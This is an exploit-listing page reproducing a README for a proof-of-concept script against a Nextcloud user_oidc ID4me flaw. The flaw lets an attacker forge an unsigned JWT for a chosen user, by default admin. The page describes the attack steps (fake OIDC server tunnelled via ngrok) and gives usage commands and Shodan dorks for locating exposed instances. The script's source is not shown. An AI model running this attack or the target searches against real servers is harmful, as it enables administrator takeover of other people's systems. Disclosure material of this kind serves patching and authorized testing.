Exploit for CVE-2026-45156

Name: Exploit for CVE-2026-45156
Rating: 5 (8 reviews)
2026-06-23 | CVSS 8.1
## https://sploitus.com/exploit?id=C0FC9086-8648-5BF4-BFEE-F541B2675907
# CVE-2026-45156: Nextcloud user_oidc ID4me JWT Signature Bypass

This repository contains the Proof of Concept (PoC) exploit script for **CVE-2026-45156**, a critical authentication bypass vulnerability in the Nextcloud `user_oidc` application.

## Vulnerability Details

*   **CVE ID:** CVE-2026-45156
*   **Advisory:** [GHSA-qqgv-fqwp-mjpp](https://github.com/nextcloud/security-advisories/security/advisories/GHSA-qqgv-fqwp-mjpp)
*   **Vulnerability:** Improper Verification of Cryptographic Signature (CWE-347)
*   **Affected Component:** Nextcloud `user_oidc` app (ID4me login functionality)
*   **Impact:** Critical (Authentication Bypass leading to Admin Takeover)
*   **Root Cause:** The `Id4meController.php` processes JWT tokens using `base64_decode()` without verifying the cryptographic signature.

Read the full technical deep-dive and story here: [Link to your blog post]

## Exploit Script

The `nextcloud_id4me_poc.py` script automates the exploitation process. It:

1.  Detects the target Nextcloud instance.
2.  Extracts the necessary CSRF token (`requesttoken`).
3.  Checks if the `user_oidc` app and ID4me endpoints are active.
4.  Forges a malicious JWT token (`alg: none`, empty signature) for the specified target user (default: `admin`).
5.  Sets up a local fake OIDC authority server.
6.  Tunnels the local server to the internet using `ngrok`.
7.  Executes the ID4me login flow, injecting the forged token.

### Prerequisites

*   Python 3.x
*   `requests` library
*   `pyngrok` library
*   An active `ngrok` account and auth token.

```bash
pip install requests pyngrok
ngrok config add-authtoken 
```

### Usage

```bash
python nextcloud_id4me_poc.py  [--user ] [--port ]
```

*   ``: The URL of the target Nextcloud instance (e.g., `https://example.com`).
*   `--user`: The username to impersonate (default: `admin`).
*   `--port`: The local port for the fake OIDC server (default: `9999`).

**Example:**

```bash
python nextcloud_id4me_poc.py https://target.lab --user admin
```

## Reconnaissance (Shodan Dorks)

To identify potentially vulnerable Nextcloud instances that have the `user_oidc` application installed, you can use the following Shodan dorks. 

*Note: Having the app installed does not automatically mean the target is vulnerable, as it must be configured and unpatched.*

**Find Nextcloud instances with OIDC/ID4me active:**
```text
title:"Nextcloud" http.html:"user_oidc"
```
```text
title:"Nextcloud" http.html:"id4me"
```
```text
http.title:"Nextcloud" http.html:"/apps/user_oidc/"
```

*Reminder: Only test systems you have explicit permission to audit.*

## Legal Disclaimer

⚠️ **WARNING: This PoC is provided for EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.**

This script is intended for security researchers and bug bounty hunters to test systems they have explicit permission to audit. Any unauthorized use of this tool against systems you do not own or have explicit, documented permission to test is strictly prohibited and may violate local, state, and federal laws.

The author assumes no liability and is not responsible for any misuse or damage caused by this program. By using this software, you agree to use it responsibly and in accordance with all applicable laws.

## Credits

*   Discovered by: **CyberTechAjju**
*   HackerOne Report: [#3489490](https://hackerone.com/reports/3489490)